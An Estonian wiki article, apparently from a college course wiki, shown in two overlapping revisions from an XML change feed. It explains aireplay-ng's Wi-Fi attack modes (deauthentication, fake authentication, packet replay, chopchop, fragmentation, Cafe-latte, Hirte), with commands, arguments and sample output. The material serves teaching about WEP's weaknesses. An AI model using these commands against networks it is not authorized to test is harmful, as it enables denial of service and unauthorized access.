&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
15:49:32  Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK võttis hästituntud nõrga ICV[link] probleemi ja järeldas sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib target MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC&#039;i muutmiseks juhul kui seal on algselt multicast.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
\[\[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30972</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30972"/>
		<updated>2011-05-10T10:19:48Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Rünnak 0: Deauthentication */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
